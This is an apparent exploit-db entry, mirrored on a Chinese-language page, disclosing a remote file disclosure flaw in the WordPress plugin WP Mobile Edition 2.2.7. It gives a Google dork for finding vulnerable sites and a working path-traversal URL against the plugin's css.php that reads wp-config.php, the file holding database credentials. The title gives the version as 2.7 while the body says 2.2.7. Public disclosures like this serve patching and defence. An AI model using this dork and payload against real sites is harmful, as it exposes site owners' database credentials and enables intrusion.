WordPress Plugin WP Mobile Edition 2.7 – Remote File Disclosure

  • 作者: Khwanchai Kaewyos
    日期: 2015-04-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/36733/
  • # Exploit Title: WordPress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability
    # Date: April 11, 2015
    # Exploit Author: @LookHin (Khwanchai Kaewyos)
    # Google Dork: inurl:?fdx_switcher=mobile
    # Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/
    # Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip
    # Version:WP Mobile Edition Version 2.2.7
    
    - Overview:
    Wordpress Plugin 'WP Mobile Edition' is not filtering data in GET parameter 'files' in file 'themes/mTheme-Unus/css/css.php'
    
    - Search on Google
    inurl:?fdx_switcher=mobile
    
    - POC
    Exploit view source code wp-config.php
    http://[server]/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php